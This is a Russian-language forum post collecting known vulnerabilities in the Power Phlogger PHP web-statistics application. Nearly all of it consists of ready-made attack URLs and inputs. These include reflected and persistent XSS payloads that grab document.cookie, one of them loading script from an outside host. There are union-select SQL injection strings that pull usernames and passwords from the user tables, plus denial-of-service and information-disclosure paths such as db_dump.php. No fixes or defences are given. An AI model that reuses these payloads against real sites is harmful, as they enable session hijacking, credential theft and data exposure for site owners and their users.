|
[Обзор уязвимостей Power Phlogger]
Power Phlogger <= 2.0.9 (config.inc.php3) File Include Vulnerability
Power Phlogger Rel_Path Remote File Include Vulnerability Power Phlogger Login.PHP SQL Injection Vulnerability Power Phlogger 'css_str' SQL Injection Vulnerability Power Phlogger 2.0.9 Remote|Local File Include Vulnerability Power Phlogger v.2.2.5 (username) SQL Injection XSS: Код:
http://site/dspLogs.php?S_hostname=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3EКод:
http://site/dspLogs.php?S_referer=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3EКод:
http://site/dspLogs.php?S_agent=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3EКод:
http://site/dspLogs.php?S_res=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3EКод:
http://site/edCss.php?css_str=12%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&action=editКод:
http://site/dspLogs.php?S_color=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3EКод:
http://site/dspLogs.php?S_online=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3EКод:
http://site/dspLogs.php?S_mp=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3EКод:
http://site/dspStats.php?edit=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3EКод:
http://site/dspLogs.php/%22%3E%3Cscript%20src=XSSКод:
http://site/dspStats.php/%22%3E%3Cscript%20src=XSSКод:
http://site/edCss.php/%22%3E%3Cscript%20src=XSSКод:
http://site/edCss.php?action=create+new&fields%5Bcss%5D=%3Cscript%3Ealert(document.cookie)%3C/script%3EXSS (Persistent): Post запрос на странице http://site/edUserprofile.php Код:
</textarea><script>alert(document.cookie)</script>Код:
"><script>alert(document.cookie)</script>Код:
"><script src=http://site.comDoS: http://site/include/get_userdata.php http://site/newaccount_self.php Зацикленные редиректы. (c)MustLive SQL иньекции: Код:
http://site/edCss.php?css_str=-1%20union%20select%20null,null,id,username,pw,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20pphl_users%20limit%200,1&action=editКод:
http://site/edit.php?site=-12%20union%20select%200,1,username,password,4,version(),user(),7,8,9,10,11,database(),13,14,15,16,17,18++from+users--http://site/include/edCss.inc.php http://site/include/foot.inc.php http://site/include/get_csscolors.inc.php http://site/include/head.inc.php http://site/include/head_stuff.inc.php http://site/include/loglist.inc.php http://site/include/pphlogger_send.inc.php http://site/modules/usercreate.php http://site/modules/htmlMimeMail.php http://site/modules/img_vis_per_hour.mod.php http://site/modules/usercreate.php http://site/modules/htmlMimeMail.php http://site/modules/img_vis_per_hour.mod.php http://site/edit_user.php http://site/main-dummy.php http://site/main.php http://site/modules/htmlMimeMail.php http://site/modules/img_vis_per_hour.mod.php http://site/modules/usercreate.php Information disclosure: http://site/modules/db_dump.php Названия базы данных,струкрура таблиц http://site/robots.txt http://site/upgrade/extchange.php http://site/main_location.inc Код:
<meta name="PHP Version" content="..." /> |
| Время: 06:44 |